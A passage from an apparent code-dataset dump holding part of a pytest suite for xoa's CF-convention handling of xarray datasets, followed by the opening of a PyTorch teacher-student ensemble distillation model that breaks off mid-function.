np.linspace(-10, -2, 5)),\n \"lat\": (\"lat\", np.linspace(43, 49, 4)),\n }\n ).stack(npts=(\"lat\", \"lon\"))\n\n res = cf.get_cf_specs().search_coord(ds, \"lon\", get=\"obj\")\n assert res is not None\n assert res.shape == (20,)\n assert res.name == \"lon\"\n\n\n@pytest.mark.parametrize(\"cf_name\", [\"temp\", None])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\", [(\"temp\", None), (\"xxx\", {\"standard_name\": \"sea_water_temperature\"}),],\n)\ndef test_cf_cfspecs_match_data_var(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims='lon', name='lon')\n temp = xr.DataArray(\n range(20, 25), dims='lon', coords={'lon': lon}, name=in_name, attrs=in_attrs\n 
)\n res = cf.get_cf_specs().match_data_var(temp, cf_name)\n if cf_name is None:\n assert res == 'temp'\n else:\n assert res is True\n\n\n@pytest.mark.parametrize(\"cf_name\", [\"temp\", None])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\", [(\"temp\", None), (\"xxx\", {\"standard_name\": \"sea_water_temperature\"}),],\n)\ndef test_cf_cfspecs_search_data_var(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims='lon', name='lon')\n temp = xr.DataArray(\n range(20, 25), dims='lon', coords={'lon': lon}, name=in_name, attrs=in_attrs\n )\n ds = temp.to_dataset()\n assert cf.get_cf_specs().search_data_var(ds, cf_name, get=\"cf_name\") == 'temp'\n\n\ndef test_cf_cfspecs_cats_get_loc_arg():\n\n cf_dict0 = {\n \"sglocator\": {\"valid_locations\": [\"u\", \"v\"],},\n \"data_vars\": {\"u\": {\"loc\": \"u\", \"add_loc\": False, \"add_coords_loc\": {\"lon\": True},},},\n }\n cf_specs0 = cf.CFSpecs(cf_dict0)\n\n ds0 = xr.Dataset(\n {\"u\": ((\"time\", \"y\", \"x\"), np.ones((1, 2, 3))), \"bathy\": ((\"y\", \"x\"), np.ones((2, 3)))},\n coords={\n \"lon\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n },\n )\n\n assert cf_specs0.coords.get_loc_arg(ds0[\"u\"]) is None\n assert cf_specs0.coords.get_loc_arg(ds0[\"bathy\"]) is None\n assert cf_specs0.coords.get_loc_arg(ds0[\"lon\"]) is None\n\n locations0 = cf_specs0.get_loc_mapping(ds0)\n assert cf_specs0.coords.get_loc_arg(ds0[\"lon\"], locations=locations0) == \"u\"\n\n cf_dict1 = cf_dict0.copy()\n cf_dict1[\"data_vars\"][\"u\"][\"add_coords_loc\"][\"lon\"] = \"v\"\n cf_specs1 = cf.CFSpecs(cf_dict1)\n locations1 = cf_specs1.get_loc_mapping(ds0)\n assert cf_specs1.coords.get_loc_arg(ds0[\"lon\"], locations=locations1) == \"v\"\n\n\n@pytest.mark.parametrize(\"cf_name\", [None, \"lon\"])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\",\n [(\"lon\", None), (\"xxx\", {\"standard_name\": \"longitude\"}), (\"xxx\", {\"units\": \"degrees_east\"}),],\n)\ndef test_cf_cfspecs_cats_format_dataarray(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims=in_name, name=in_name, attrs=in_attrs)\n lon = cf.get_cf_specs().coords.format_dataarray(lon, cf_name)\n assert lon.name == \"lon\"\n assert lon.standard_name == \"longitude\"\n assert lon.long_name == \"Longitude\"\n assert lon.units == \"degrees_east\"\n\n\ndef test_cf_cfspecs_cats_format_dataarray_unknown():\n coord = xr.DataArray(range(5), name='foo')\n cfspecs = cf.get_cf_specs()\n\n coord_fmt = cfspecs.coords.format_dataarray(coord, rename=False)\n assert coord_fmt is None\n\n coord_fmt = cfspecs.coords.format_dataarray(coord, rename=True)\n assert coord_fmt.name == \"foo\"\n\n\ndef test_cf_cfspecs_cats_get_allowed_names():\n cfg = {\"data_vars\": {\"banana\": {\"name\": \"bonono\", \"alt_names\": [\"binini\", \"bununu\"]}}}\n cfspecs = cf.CFSpecs(cfg)\n assert cfspecs.data_vars.get_allowed_names(\"banana\") == ['banana', 'bonono', 'binini', 'bununu']\n\n\ndef test_cf_cfspecs_format_obj_with_loc():\n\n cf_dict0 = {\n \"sglocator\": {\"valid_locations\": [\"u\", \"v\"],},\n \"data_vars\": {\n \"u\": {\"loc\": \"u\", \"add_loc\": False, \"add_coords_loc\": {\"lon\": True, \"x\": True},},\n \"bathy\": {\"add_loc\": True},\n },\n }\n cf_specs0 = cf.CFSpecs(cf_dict0)\n\n ds0 = xr.Dataset(\n {\"u\": ((\"time\", \"y\", \"x\"), np.ones((1, 2, 3))), \"bathy\": ((\"y\", \"x\"), np.ones((2, 3)))},\n coords={\n \"lon\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n 
},\n )\n ds = cf_specs0.format_dataset(ds0)\n assert \"x_u\" in ds.dims\n assert \"y\" in ds.dims\n assert \"u\" in ds\n assert \"bathy_u\" in ds\n\n\n@pytest.mark.parametrize(\"cf_name\", [None, \"temp\"])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\", [(\"temp\", None), (\"yyy\", {\"standard_name\": \"sea_water_temperature\"}),],\n)\ndef test_cf_cfspecs_format_data_var(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims='xxx', name='xxx', attrs={'standard_name': 'longitude'})\n temp = xr.DataArray(\n range(20, 25), dims='xxx', coords={'xxx': lon}, name=in_name, attrs=in_attrs\n )\n temp = cf.get_cf_specs().format_data_var(temp, cf_name)\n assert temp.name == \"temp\"\n assert temp.standard_name == \"sea_water_temperature\"\n assert temp.long_name == \"Temperature\"\n assert temp.units == \"degrees_celsius\"\n assert temp.lon.standard_name == \"longitude\"\n\n\ndef test_cf_cfspecs_format_data_var_coord():\n da = xr.DataArray(0, attrs={'standard_name': 'longitude_at_u_location'})\n da = cf.get_cf_specs().format_data_var(da)\n\n\n# assert da.name == \"lon_u\"\n\n\ndef test_cf_cfspecs_format_data_var_specialize():\n da = xr.DataArray(1, name=\"salinity\")\n cfspecs = cf.CFSpecs({'data_vars': {'sal': {'name': 'supersal'}}})\n da = cfspecs.format_data_var(da, specialize=True)\n assert da.name == \"supersal\"\n assert da.standard_name == \"sea_water_salinity\"\n\n\ndef test_cf_cfspecs_format_data_var_loc():\n temp = xr.DataArray(0, name='xtemp', attrs={'standard_name': 'banana_at_x_location'})\n cfspecs = cf.get_cf_specs()\n\n temp_fmt = cfspecs.format_data_var(temp, \"temp\", format_coords=False, replace_attrs=True)\n assert temp_fmt.name == \"temp\"\n assert temp_fmt.standard_name == \"sea_water_temperature\" # _at_x_location\"\n\n cfspecs = cf.CFSpecs({\"data_vars\": {\"temp\": {\"add_loc\": True}}})\n temp_fmt = cfspecs.format_data_var(temp, \"temp\", format_coords=False, replace_attrs=True)\n assert temp_fmt.name == \"temp_x\"\n\n\ndef test_cf_cfspecs_format_data_var_unkown():\n da = xr.DataArray(range(5), name='foo')\n cfspecs = cf.get_cf_specs()\n\n da_fmt = cfspecs.format_data_var(da, rename=False)\n assert da_fmt.name == \"foo\"\n\n da_fmt = cfspecs.format_data_var(da, rename=True)\n assert da_fmt.name == \"foo\"\n\n\ndef test_cf_cfspecs_exclude_data_var():\n ds = xr.Dataset({\"temperature\": (\"nx\", [1, 2])})\n ds.temperature.attrs[\"standard_name\"] = \"sea_water_potential_temperature\"\n cfspecs = cf.CFSpecs(\n {\"data_vars\": {\"temp\": {\"name\": \"temperature\"}, \"ptemp\": {\"exclude\": True}}}\n )\n ds = cfspecs.decode(ds)\n assert \"temp\" in ds.data_vars\n\n\ndef test_cf_cfspecs_to_loc():\n ds = xr.Dataset(\n {\"u_t\": ((\"time\", \"y\", \"x_u\"), np.ones((1, 2, 3)))},\n coords={\n \"lon_u\": ((\"y\", \"x_u\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x_u\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n },\n )\n cfspecs = cf.get_cf_specs()\n dso = cfspecs.to_loc(ds, x=False, y='v', u=None)\n assert \"x\" in dso.dims\n assert \"y_v\" in dso.dims\n assert \"u_t\" in dso\n assert \"lon_u\" in dso\n\n\ndef test_cf_cfspecs_reloc():\n ds = xr.Dataset(\n {\"u_t\": ((\"time\", \"y\", \"x_u\"), np.ones((1, 2, 3)))},\n coords={\n \"lon_u\": ((\"y\", \"x_u\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x_u\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n },\n )\n cfspecs = cf.get_cf_specs()\n dso = cfspecs.reloc(ds, u=False, t='u')\n assert \"x\" in dso.dims\n assert \"u_u\" in dso\n assert \"lon\" in dso\n\n\ndef test_cf_cfspecs_coords_get_axis():\n cfspecs = 
cf.get_cf_specs().coords\n\n # from attrs\n depth = xr.DataArray([1], dims='aa', attrs={'axis': 'z'})\n assert cfspecs.get_axis(depth) == 'Z'\n\n # from CF specs\n depth = xr.DataArray([1], dims='aa', attrs={'standard_name': 'ocean_layer_depth'})\n assert cfspecs.get_axis(depth) == 'Z'\n\n\ndef test_cf_cfspecs_coords_get_dim_type():\n cfspecs = cf.get_cf_specs().coords\n\n # from name\n assert cfspecs.get_dim_type('aa') is None\n assert cfspecs.get_dim_type('xi') == \"x\"\n\n # from a known coordinate\n coord = xr.DataArray([1], dims='aa', attrs={'standard_name': 'longitude'})\n da = xr.DataArray([1], dims='aa', coords={'aa': coord})\n assert cfspecs.get_dim_type('aa', da) == \"x\"\n\n\ndef test_cf_cfspecs_coords_get_dim_types():\n cfspecs = cf.get_cf_specs().coords\n\n aa = xr.DataArray([0, 1], dims=\"aa\", attrs={\"standard_name\": \"latitude\"})\n da = xr.DataArray(np.ones((2, 2, 2)), dims=('foo', 'aa', 'xi'), coords={'aa': aa})\n\n assert cfspecs.get_dim_types(da) == (None, 'y', 'x')\n assert cfspecs.get_dim_types(da, unknown='-') == (\"-\", 'y', 'x')\n assert cfspecs.get_dim_types(da, asdict=True) == {\"foo\": None, \"aa\": \"y\", \"xi\": \"x\"}\n\n\ndef test_cf_cfspecs_coords_search_dim():\n cfspecs = cf.get_cf_specs().coords\n\n # from name\n temp = xr.DataArray(np.arange(2 * 3).reshape(1, 2, 3), dims=('aa', 'ny', 'x'))\n assert cfspecs.search_dim(temp, 'y') == 'ny'\n assert cfspecs.search_dim(temp) is None\n\n # from explicit axis attribute\n depth = xr.DataArray([1], dims='aa', attrs={'axis': 'z'})\n temp.coords['aa'] = depth\n assert cfspecs.search_dim(temp, 'z') == 'aa'\n assert cfspecs.search_dim(temp) is None\n assert cfspecs.search_dim(depth) == {\"dim\": \"aa\", \"type\": \"z\", \"cf_name\": None}\n\n # from known coordinate\n del temp.coords['aa'].attrs['axis']\n temp.coords['aa'].attrs['standard_name'] = 'ocean_layer_depth'\n assert cfspecs.search_dim(temp, 'z') == 'aa'\n assert cfspecs.search_dim(temp, 'depth') == 'aa' # by generic name\n assert cfspecs.search_dim(temp) is None\n\n # subcoords\n level = xr.DataArray(np.arange(2), dims='level')\n depth = xr.DataArray(\n np.arange(2 * 3).reshape(2, 3),\n dims=('level', 'lon'),\n name='depth',\n coords={'level': level, 'lon': [3, 4, 5]},\n )\n assert cfspecs.search_dim(depth) == {'dim': 'level', 'cf_name': 'level', 'type': 'z'}\n assert cfspecs.search_dim(depth.level) == {'dim': 'level', 'type': 'z', 'cf_name': 'level'}\n depth = depth.rename(level='aa')\n depth.aa.attrs['axis'] = 'Z'\n assert cfspecs.search_dim(depth) == {'dim': 'aa', 'type': 'z', 'cf_name': None}\n\n # not found but only 1d and no dim_type specified\n assert cfspecs.search_dim(xr.DataArray([5], dims='bb')) == {\n 'dim': 'bb',\n 'type': None,\n 'cf_name': None,\n }\n\n\ndef test_cf_cfspecs_coords_search_from_dim():\n\n lon = xr.DataArray([1, 2], dims='lon')\n level = xr.DataArray([1, 2, 3], dims='aa', attrs={'standard_name': 'ocean_sigma_coordinate'})\n mem = xr.DataArray(range(3), dims='mem')\n temp = xr.DataArray(\n np.zeros((mem.size, level.size, lon.size)),\n dims=('mem', 'aa', 'lon'),\n coords={'mem': mem, 'aa': level, 'lon': lon},\n )\n\n cfspecs = cf.get_cf_specs().coords\n\n # Direct coordinate\n assert cfspecs.search_from_dim(temp, 'aa').name == 'aa'\n\n # Depth coordinate because the only one with this dim\n depth = xr.DataArray(\n np.ones((level.size, lon.size)), dims=('aa', 'lon'), coords={'aa': level, 'lon': lon}\n )\n temp.coords['depth'] = depth\n assert cfspecs.search_from_dim(temp, 'aa').name == 'depth'\n\n # Cannot get dim_type and we have 
multiple coords with this dim\n del temp.coords['aa']\n fake = xr.DataArray(np.ones((level.size, lon.size)), dims=('aa', 'lon'), coords={'lon': lon})\n temp.coords['fake'] = fake\n assert cfspecs.search_from_dim(temp, 'aa') is None\n\n # Can get dim_type back from name\n temp = temp.rename(aa='level')\n assert cfspecs.search_from_dim(temp, 'level').name == 'depth'\n\n # Nothing identifiable\n temp = xr.DataArray([3], dims='banana')\n assert cfspecs.search_from_dim(temp, \"banana\") is None\n\n\ndef test_cf_cfspecs_coords_get_dims():\n lat = xr.DataArray([4, 5], dims='yy', attrs={'units': 'degrees_north'})\n depth = xr.DataArray([4, 5], dims='level', attrs={'axis': 'Z'})\n da = xr.DataArray(\n np.ones((2, 2, 2, 2)), dims=('r', 'level', 'yy', 'xi'), coords={'level': depth, 'yy': lat}\n )\n\n cfspecs = cf.get_cf_specs().coords\n dims = cfspecs.get_dims(da, 'xyzt', allow_positional=True)\n assert dims == ('xi', 'yy', 'level', 'r')\n dims = cfspecs.get_dims(da, 'f', errors=\"ignore\")\n assert dims == (None,)\n\n\ndef test_cf_cfspecs_infer_coords():\n ds = xr.Dataset({\"temp\": (\"nx\", [1, 2]), \"lon\": (\"nx\", [4, 5])})\n ds = cf.get_cf_specs().infer_coords(ds)\n assert \"lon\" in ds.coords\n\n\ndef test_cf_cfspecs_decode_encode():\n ds = xoa.open_data_sample(\"croco.south-africa.meridional.nc\")\n cfspecs = cf.CFSpecs(xoa.get_data_sample(\"croco.cfg\"))\n\n dsc = cfspecs.decode(ds)\n assert list(dsc) == [\n 'akt',\n 'cs_r',\n 'cs_w',\n 'Vtransform',\n 'angle',\n 'el',\n 'corio',\n 'bathy',\n 'hbl',\n 'hc',\n 'mask_rho',\n 'ex',\n 'ey',\n 'sal',\n 'sc_r',\n 'sc_w',\n 'ptemp',\n 'time_step',\n 'u',\n 'v',\n 'w',\n 'xl',\n 'ssh',\n ]\n assert list(dsc.coords) == [\n 'y_rho',\n 'y_v',\n 'lat_rho',\n 'lat_u',\n 'lat_v',\n 'lon_rho',\n 'lon_u',\n 'lon_v',\n 'sig_rho',\n 'sig_w',\n 'time',\n 'x_rho',\n 'x_u',\n ]\n assert set(dsc.dims) == {'auxil', 'sig_rho', 'sig_w', 'time', 'x_rho', 'x_u', 'y_rho', 'y_v'}\n\n dse = cfspecs.encode(dsc)\n assert list(dse) == list(ds)\n assert list(dse.coords) == list(ds.coords)\n assert list(dse.dims) == list(ds.dims)\n ds.close()\n\n\ndef test_cf_dataarraycfaccessor():\n from xoa.accessors import CFDataArrayAccessor\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", xr.core.extensions.AccessorRegistrationWarning)\n xr.register_dataarray_accessor('xcf')(CFDataArrayAccessor)\n\n lon = xr.DataArray(range(5), dims='xxx', name='xxx', attrs={'standard_name': 'longitude'})\n temp = xr.DataArray(range(20, 25), dims='xxx', coords={'xxx': lon}, name='temp')\n\n assert temp.xcf.lon.name == 'xxx'\n assert temp.xcf.lat is None\n assert temp.xcf.lon.xcf.name == \"lon\"\n\n\ndef test_cf_datasetcfaccessor():\n from xoa.accessors import CFDatasetAccessor\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", xr.core.extensions.AccessorRegistrationWarning)\n xr.register_dataset_accessor('xcf')(CFDatasetAccessor)\n\n lon = xr.DataArray(range(5), dims='xxx', name='xxx', attrs={'standard_name': 'longitude'})\n temp = xr.DataArray(\n range(20, 25),\n dims='xxx',\n coords={'xxx': lon},\n name='yoyo',\n attrs={'standard_name': 'sea_water_temperature'},\n )\n\n ds = temp.to_dataset()\n assert ds.xcf.temp.name == 'yoyo'\n assert ds.xcf.sal is None\n\n\ndef test_cf_register_cf_specs():\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n\n content = \"\"\"\n [register]\n name=myname\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n\n cf_specs = cf.CFSpecs(content)\n assert cf_specs.name == \"myname\"\n\n 
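# (added note) registering positionally keeps the declared name, while registering with a\n # keyword (as done below with myothername=cf_specs) renames the specs to that keyword,\n # which is what the asserts check.\n 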
cf.register_cf_specs(cf_specs)\n assert cf_specs in cf_cache[\"registered\"]\n assert cf_specs.name == \"myname\"\n\n cf.register_cf_specs(myothername=cf_specs)\n assert cf_specs in cf_cache[\"registered\"]\n assert cf_specs.name == \"myothername\"\n\n\ndef test_cf_get_cf_specs_registered():\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n content = \"\"\"\n [register]\n name=myname\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs_in = cf.CFSpecs(content)\n cf.register_cf_specs(cf_specs_in)\n\n cf_specs_out = cf.get_cf_specs(name='myname')\n assert cf_specs_out is cf_specs_in\n\n\ndef test_cf_get_cf_specs_from_encoding():\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n content = \"\"\"\n [register]\n name=mynam234\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs_in = cf.CFSpecs(content)\n cf.register_cf_specs(cf_specs_in)\n\n ds = xr.Dataset(\n {\n \"mytemp\": ([\"mylat\", \"mylon\"], np.ones((2, 2))),\n \"mysal\": ([\"mylat\", \"mylon\"], np.ones((2, 2))),\n },\n coords={\"mylon\": np.arange(2), \"mylat\": np.arange(2)},\n )\n\n ds.encoding.update(cf_specs=\"mynam234\")\n assert cf.get_cf_specs_from_encoding(ds) is cf_specs_in\n\n ds.mytemp.encoding.update(cf_specs=\"mynam234\")\n assert cf.get_cf_specs_from_encoding(ds.mytemp) is cf_specs_in\n\n ds.mylon.encoding.update(cf_specs=\"mynam234\")\n assert cf.get_cf_specs_from_encoding(ds.mylon) is cf_specs_in\n\n assert cf.get_cf_specs_from_encoding(ds.mylat) is None\n\n\ndef test_cf_set_cf_specs_registered():\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n content = \"\"\"\n [register]\n name=myname2\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs_in = cf.CFSpecs(content)\n cf.register_cf_specs(cf_specs_in)\n\n with cf.set_cf_specs(\"myname2\") as cfspecs:\n assert cfspecs is cf_specs_in\n\n\ndef test_cf_get_cf_specs_matching_score():\n\n cf_content0 = \"\"\"\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs0 = cf.CFSpecs(cf_content0)\n cf_content1 = \"\"\"\n [data_vars]\n [[temp]]\n name=mytemp\n [[sal]]\n name=mysal\n [coords]\n [[lon]]\n name=mylon\n \"\"\"\n cf_specs1 = cf.CFSpecs(cf_content1)\n cf_content2 = \"\"\"\n [data_vars]\n [[temp]]\n name=mytemp\n [[sal]]\n name=mysal\n \"\"\"\n cf_specs2 = cf.CFSpecs(cf_content2)\n\n ds = xr.Dataset(\n {\n \"mytemp\": ([\"mylat\", \"mylon\"], np.ones((2, 2))),\n \"mysal\": ([\"mylat\", \"mylon\"], np.ones((2, 2))),\n },\n coords={\"mylon\": np.arange(2), \"mylat\": np.arange(2)},\n )\n\n for cf_specs, score in [(cf_specs0, 25), (cf_specs1, 75), (cf_specs2, 50)]:\n assert cf.get_cf_specs_matching_score(ds, cf_specs) == score\n\n\ndef test_cf_infer_cf_specs():\n\n cf_content0 = \"\"\"\n [register]\n [[attrs]]\n source=\"*hycom3d*\"\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs0 = cf.CFSpecs(cf_content0)\n cf_content1 = \"\"\"\n [data_vars]\n [[temp]]\n name=mytemp\n [[sal]]\n name=mysal\n [coords]\n [[lon]]\n name=mylon\n \"\"\"\n cf_specs1 = cf.CFSpecs(cf_content1)\n cf_content2 = \"\"\"\n [register]\n name=hycom3d\n\n [data_vars]\n [[temp]]\n name=mytemp\n [[sal]]\n name=mysal\n \"\"\"\n cf_specs2 = cf.CFSpecs(cf_content2)\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n cf.register_cf_specs(cf_specs0, cf_specs1, cf_specs2)\n\n temp = xr.DataArray([1], dims=\"mylon\")\n sal = xr.DataArray([1], dims=\"mylon\")\n lon = xr.DataArray([1], dims=\"mylon\")\n\n ds = xr.Dataset({\"mytemp\": temp, \"mysal\": sal}, coords={\"mylon\": lon})\n assert 
cf.infer_cf_specs(ds) is cf_specs1\n\n ds.attrs.update(source=\"my hycom3d!\")\n assert cf.infer_cf_specs(ds) is cf_specs0\n\n ds.attrs.update(cf_specs=\"hycom3d\")\n assert cf.infer_cf_specs(ds) is cf_specs2\n\n\n# test_cf_cfspecs_decode_encode()\n# test_cf_cfspecs_format_data_var_loc()\n# test_cf_cfspecs_coords_get_loc_arg()\n# test_cf_cfspecs_format_obj_with_loc()\n# test_cf_cfspecs_get_loc_mapping()\n# test_cf_cfspecs_coords_search_dim()\ntest_cf_cfspecs_search_coord_with_stacking()\n\n# lon = xr.DataArray(range(5), dims=\"lon\")\n# banana = xr.DataArray(\n# lon + 20,\n# dims=\"lon\",\n# coords=[lon],\n# name=\"banana_t\",\n# attrs={\"standard_name\": \"banana\", \"taste\": \"good\"},\n# )\n# floc, fname, fattrs, out_name, out_standard_name, replace_attrs=None, \"sst_q\", {\"standard_name\": [\"potatoe\"]}, \"sst_q\", \"potatoe_at_q_location\", True\n# print(cf.SGLocator().format_dataarray(\n# banana, loc=floc, name=fname, attrs=fattrs, replace_attrs=replace_attrs\n# ))\n\n# sg = cf.SGLocator()\n# print(sg.get_loc(name=\"u_t\", attrs=dict(standard_name = None, long_name = None)))\n\n# test_cf_cfspecs_decode_encode()\n","sub_path":"xoa/tests/test_cf.py","file_name":"test_cf.py","file_ext":"py","file_size_in_byte":34797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"328731493","text":"# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append(\"../\") \nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom common import BaseNet\nfrom time import time\nfrom DeepFM.DeepFM import DeepFM\nfrom xDeepFM.xDeepFM import xDeepFM\nfrom DCN.DCN import DCN\nfrom DNN.DNN import DNN\nfrom layers import mlps\nimport numpy as np\nimport random\nimport os\nimport logging\n\nclass ensemble(nn.Module, BaseNet):\n def __init__(self, student_net, teacher_net_list=None, gamma=0.95, T=3,\n soft_label_type=\"\", use_gating=False, teacher_state_dict_list=None, pretrain_model=None,\n gating_layer=3, gating_dim=100, gating_drop=0, gating_bn=False,\n use_s_input=False, g_T=2, gate_only=False,\n s_t_dim=0, std_gamma=0, res_prob=False,\n use_rand=False, fix_teacher=True, \n std_weight=False, remove_std=0, use_kl=False,\n topk=0, both_loss=False, \n use_fixed_weight=False,\n softmax_fixed_weight=False,\n weight_prob=False,\n use_dynamic_weight=False,\n gating_bias=True,\n local=-1,\n **params):\n super().__init__()\n self.teacher_list = nn.ModuleList(teacher_net_list)\n self.teacher_state_dict_list = teacher_state_dict_list\n self.student = student_net\n self.local = local\n \n self.device = self.student.device\n self.soft_label_type = soft_label_type\n self.use_gating = use_gating\n self.gamma = gamma\n self.T = T\n self.g_T = g_T\n self.use_s_input = use_s_input\n self.gate_only = gate_only\n self.pretrain_model = pretrain_model\n self.s_t_dim = s_t_dim\n self.std_gamma = std_gamma\n self.res_prob = res_prob\n self.use_rand = use_rand\n self.std_weight = std_weight\n self.fix_teacher = fix_teacher\n self.remove_std = remove_std\n self.use_kl = use_kl\n self.topk = topk\n self.both_loss = both_loss\n self.use_fixed_weight = use_fixed_weight\n self.softmax_fixed_weight = softmax_fixed_weight\n self.weight_prob = weight_prob\n self.gating_bias = gating_bias\n\n self.use_dynamic_weight = use_dynamic_weight\n \n if self.use_fixed_weight:\n# self.fixed_weight = nn.Parameter(torch.randn(len(self.teacher_list))).to(self.device).view(-1, 1)\n self.fixed_weight_lin = nn.Linear(len(params[\"teacher_name_list\"]), 1)\n \n if 
self.use_dynamic_weight:\n# self.weight_lin = nn.Linear(len(params[\"teacher_name_list\"]),\n# len(params[\"teacher_name_list\"]), bias=self.gating_bias)\n self.weight_lin = mlps(input_dim=len(params[\"teacher_name_list\"]), hidden_dim=gating_dim, hidden_layer=gating_layer,\n layernorm=gating_bn, dropout_rate=gating_drop, out_dim=len(params[\"teacher_name_list\"]))\n \n if self.use_kl:\n self.course_loss_fn = nn.KLDivLoss(reduction=\"batchmean\")\n self.student.loss_fn = nn.KLDivLoss(reduction=\"batchmean\")\n else:\n self.course_loss_fn = self.student.loss_fn\n\n if self.use_gating:\n embedding_len = self.student.hidden_dim if self.use_s_input \\\n else sum([teacher.course_vec_len for teacher in self.teacher_list])\n self.gating = mlps(input_dim=embedding_len, hidden_dim=gating_dim, hidden_layer=gating_layer,\n layernorm=gating_bn, dropout_rate=gating_drop,\n out_dim=1 if self.res_prob else len(teacher_net_list))\n self.gating.apply(self.init_weights)\n\n elif std_gamma > 0:\n embedding_len = self.student.hidden_dim\n self.aux_layer = mlps(input_dim=embedding_len, hidden_dim=gating_dim, hidden_layer=gating_layer,\n layernorm=gating_bn, dropout_rate=gating_drop, out_dim=1)\n self.aux_layer.apply(self.init_weights)\n self.mse_loss = nn.MSELoss()\n \n self.load_pretrain(fix_teacher=self.fix_teacher)\n\n\n def load_pretrain(self, fix_teacher=True):\n if self.pretrain_model is not None:\n logging.info(\"Loading ensemble pretrain weights.\")\n \n try:\n self.load_weights(self.pretrain_model)\n except:\n pretrained_dict = torch.load(self.pretrain_model, map_location='cuda:0' \n if str(self.device)!=\"cpu\" else \"cpu\")\n model_dict = self.state_dict()\n# print(pretrained_dict.keys())\n# print(\"---\")\n# print(model_dict.keys())\n# print(\"---\")\n# print(pretrained_dict.keys())\n for k,v in pretrained_dict.items():\n if \"student\" not in k and k in model_dict:\n model_dict[k] = pretrained_dict[k]\n self.load_state_dict(model_dict)\n return\n else:\n logging.info(\"Teacher loading\")\n for idx, teacher in enumerate(self.teacher_list):\n teacher.load_weights(self.teacher_state_dict_list[idx])\n if fix_teacher:\n logging.info(\"Fixing teacher\")\n for teacher_model in self.teacher_list:\n for param in teacher_model.parameters():\n param.requires_grad = False\n else:\n logging.info(\"Fine tune teacher\")\n\n def cross_entropy_fn(self, prob, labels, weight=None):\n loss_vec = - (labels * torch.log(prob) + (1 - labels) * torch.log(1 - prob)) \n if weight is not None:\n loss_vec = weight * loss_vec\n loss_vec = loss_vec[loss_vec!=0]\n return loss_vec.mean()\n \n\n def check_teachers(self):\n s_logloss, s_auc = self.evaluate(self.iter_val)\n auc_list = []\n keep_list = []\n logging.info(\"S [DNN], auc: {:.5f}, logloss: {:.5f}\".format(s_auc, s_logloss))\n for idx, teacher in enumerate(self.teacher_list):\n teacher_name = teacher.__class__.__name__\n t_logloss, t_auc = teacher.evaluate(self.iter_val)\n auc_list.append(t_auc)\n if t_auc >= s_auc:\n keep_list.append(teacher)\n logging.info(\"Keep {}.\".format(teacher_name))\n else:\n logging.info(\"Drop {}.\".format(teacher_name))\n logging.info(\"T [{}], auc: {:.5f}, logloss: {:.5f}.\".format(teacher_name, t_auc, t_logloss))\n self.teacher_list = nn.ModuleList(keep_list)\n return s_logloss, s_auc\n \n def entropy_select(self, probs, logits):\n probs_dis = torch.abs(probs - 0.5)\n entropy_min_index = torch.max(probs_dis, dim=1)[1]\n return (logits[range(self.batch_size), entropy_min_index] / self.T).sigmoid().unsqueeze(1)\n \n def topk_select(self, 
probs, logits):\n probs_dis = torch.abs(probs - 0.5)\n topk_index = probs_dis.topk(self.topk, dim=1)[1]\n topk_logits = logits[torch.arange(self.batch_size)[:,None], topk_index]\n tpk_logits_t_avg_sig = (topk_logits/self.T).mean(dim=-1).sigmoid().unsqueeze(1)\n tpk_logits_t_sig_avg = (topk_logits/self.T).sigmoid().mean(dim=-1).unsqueeze(1)\n return tpk_logits_t_avg_sig, tpk_logits_t_sig_avg\n \n def merge_teachers(self, teacher_sig_tensor, s_input, labels=None):\n logits = teacher_sig_tensor\n probs = teacher_sig_tensor.sigmoid()\n \n# print(probs.size())\n# sys.exit()\n\n return_dict = {}\n return_dict[\"logits\"] = logits\n return_dict[\"probs\"] = probs\n return_dict[\"prob_std\"] = probs.std(dim=-1).unsqueeze(1)\n return_dict[\"logits_t_avg_sig\"] = (logits/self.T).mean(dim=-1).sigmoid().unsqueeze(1)\n return_dict[\"logits_t_sig_avg\"] = (logits/self.T).sigmoid().mean(dim=-1).unsqueeze(1)\n \n \n return_dict[\"entropy_prob\"] = self.entropy_select(probs, logits)\n if self.topk > 0:\n return_dict[\"tpk_logits_t_avg_sig\"], return_dict[\"tpk_logits_t_sig_avg\"] \\\n = self.topk_select(probs, logits)\n\n if self.use_fixed_weight:\n inp = probs if self.weight_prob else logits\n return_dict[\"fixed_weight_avg\"] = self.fixed_weight_lin(inp).sigmoid()\n \n if self.use_dynamic_weight:\n inp = probs if self.weight_prob else logits\n dynamic_weight = 